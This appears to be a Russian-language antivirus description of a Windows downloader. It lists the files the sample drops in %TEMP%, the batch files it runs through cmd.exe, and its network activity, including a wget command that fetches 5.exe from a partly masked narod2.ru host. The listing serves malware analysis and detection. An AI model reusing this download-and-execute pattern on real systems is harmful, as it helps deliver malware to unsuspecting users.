Техническая информация
- %TEMP%\2.tmp\5.exe
- <SYSTEM32>\wget.exe -c http://da####sha.narod2.ru/5.exe
- %TEMP%\1.tmp\down.exe start
- %TEMP%\2.tmp\5.exe (загружен из сети Интернет)
- <SYSTEM32>\cmd.exe /c ""%TEMP%\2.tmp\Копия upload.bat" "start" "
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\1.bat" "
- <SYSTEM32>\wget.exe
- %TEMP%\2.tmp\Копия upload.bat
- %TEMP%\2.tmp\5.exe
- %TEMP%\1.tmp\down.exe
- %TEMP%\1.tmp\1.bat
- %TEMP%\1.tmp\1.jpg
- %TEMP%\1.tmp\wget.exe
- %TEMP%\2.tmp\Копия upload.bat
- 'da####sha.narod2.ru':80
- da####sha.narod2.ru/5.exe
- DNS ASK da####sha.narod2.ru
- '<IP-адрес в локальной сети>':1035